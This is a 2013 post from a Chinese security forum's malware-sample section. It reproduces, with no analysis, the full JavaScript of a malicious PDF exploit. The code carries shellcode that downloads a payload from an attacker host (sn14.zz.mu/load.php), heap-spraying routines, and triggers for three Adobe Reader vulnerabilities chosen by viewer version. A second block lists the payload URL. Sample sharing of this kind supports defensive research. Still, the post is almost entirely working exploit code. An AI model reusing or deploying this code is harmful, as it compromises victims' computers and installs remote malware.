收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 网络安全(毒网分析) http://sn14.zz.mu/pdf.php【Exploit BY哀酱】
返回列表 发新帖
查看: 1363|回复: 1
收起左侧

[已鉴定] http://sn14.zz.mu/pdf.php【Exploit BY哀酱】

[复制链接]
哀酱俏佳人
发表于 2013-6-9 17:10:26 | 显示全部楼层 |阅读模式
  1. function fix_it(yarsp, len){
  2.   while (yarsp.length * 2 < len){
  3.     yarsp += yarsp;
  4.   }
  5.   yarsp = yarsp.substring(0, len / 2);
  6.   return yarsp;
  7. }
  8. function util_printf(){
  9.   var payload = unescape("
  10. %uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C
  11. %u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3
  12. %u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB
  13. %u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3
  14. %u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698
  15. %uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033
  16. %u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98
  17. %u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u732F%u316E%u2E34%u7A7A%u6D2E
  18. %u2F75%u6C2F%u616F%u2E64%u6870%u3F70%u7073%u3D6C%u6470%u5F66%u7865%u0070");
  19.   var nop = unescape("%u0A0A%u0A0A%u0A0A%u0A0A");
  20.   var heapblock = nop + payload;
  21.   var bigblock = unescape("%u0A0A%u0A0A");
  22.   var headersize = 20;
  23.   var spray = headersize + heapblock.length;
  24.   while (bigblock.length < spray){
  25.     bigblock += bigblock;
  26.   }
  27.   var fillblock = bigblock.substring(0, spray);
  28.   var block = bigblock.substring(0, bigblock.length - spray);
  29.   while (block.length + spray < 0x40000){
  30.     block = block + block + fillblock;
  31.   }
  32.   var mem_array = new Array();
  33.   for (var i = 0; i < 1400; i ++ ){
  34.     mem_array[i] = block + heapblock;
  35.   }
  36.   var num =
  37. 129999999999999999998888888888888888888888888888888888888888888888888888888888888888888888
  38. 888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888
  39. 888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888
  40. 88888888888888888888888888;
  41.   util.printf("%45000f", num);
  42. }
  43. function collab_email(){
  44.   var shellcode = unescape("
  45. %uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C
  46. %u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3
  47. %u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB
  48. %u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3
  49. %u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698
  50. %uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033
  51. %u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98
  52. %u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u732F%u316E%u2E34%u7A7A%u6D2E
  53. %u2F75%u6C2F%u616F%u2E64%u6870%u3F70%u7073%u3D6C%u6470%u5F66%u7865%u0070");
  54.   var mem_array = new Array();
  55.   var cc = 0x0c0c0c0c;
  56.   var addr = 0x400000;
  57.   var sc_len = shellcode.length * 2;
  58.   var len = addr - (sc_len + 0x38);
  59.   var yarsp = unescape("%u9090%u9090");
  60.   yarsp = fix_it(yarsp, len);
  61.   var count2 = (cc - 0x400000) / addr;
  62.   for (var count = 0; count < count2; count ++ ){
  63.     mem_array[count] = yarsp + shellcode;
  64.   }
  65.   var overflow = unescape("%u0c0c%u0c0c");
  66.   while (overflow.length < 44952){
  67.     overflow += overflow;
  68.   }
  69.   this .collabStore = Collab.collectEmailInfo({
  70.     subj : "", msg : overflow
  71.   }
  72.   );
  73. }
  74. function collab_geticon(){
  75.   if (app.doc.Collab.getIcon){
  76.     var arry = new Array();
  77.     var vvpethya = unescape("
  78. %uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C
  79. %u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3
  80. %u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB
  81. %u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3
  82. %u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698
  83. %uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033
  84. %u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98
  85. %u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u732F%u316E%u2E34%u7A7A%u6D2E
  86. %u2F75%u6C2F%u616F%u2E64%u6870%u3F70%u7073%u3D6C%u6470%u5F66%u7865%u0070");
  87.     var hWq500CN = vvpethya.length * 2;
  88.     var len = 0x400000 - (hWq500CN + 0x38);
  89.     var yarsp = unescape("%u9090%u9090");
  90.     yarsp = fix_it(yarsp, len);
  91.     var p5AjK65f = (0x0c0c0c0c - 0x400000) / 0x400000;
  92.     for (var vqcQD96y = 0; vqcQD96y < p5AjK65f; vqcQD96y ++ ){
  93.       arry[vqcQD96y] = yarsp + vvpethya;
  94.     }
  95.     var tUMhNbGw = unescape("%09");
  96.     while (tUMhNbGw.length < 0x4000){
  97.       tUMhNbGw += tUMhNbGw;
  98.     }
  99.     tUMhNbGw = "N." + tUMhNbGw;
  100.     app.doc.Collab.getIcon(tUMhNbGw);
  101.   }
  102. }
  103. function PPPDDDFF(){
  104.   var version = app.viewerVersion.toString();
  105.   version = version.replace(/\D/g, '');
  106.   var varsion_array = new Array(version.charAt(0), version.charAt(1), version.charAt(2));
  107.   if ((varsion_array[0] == 8) && (varsion_array[1] == 0) || (varsion_array[1] == 1 &&
  108.   varsion_array[2] < 3)){
  109.     util_printf();
  110.   }
  111.   if ((varsion_array[0] < 8) || (varsion_array[0] == 8 && varsion_array[1] < 2 &&
  112.   varsion_array[2] < 2)){
  113.     collab_email();
  114.   }
  115.   if ((varsion_array[0] < 9) || (varsion_array[0] == 9 && varsion_array[1] < 1)){
  116.     collab_geticon();
  117.   }
  118. }
  119. PPPDDDFF();
复制代码
  1. http://sn14.zz.mu//load.php?spl=pdf_exp
复制代码
回复

举报

王子带着刀
发表于 2013-6-9 21:43:02 | 显示全部楼层
QQ截图20130609214457.png
回复

举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-2-3 04:04 , Processed in 0.134249 second(s), 19 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表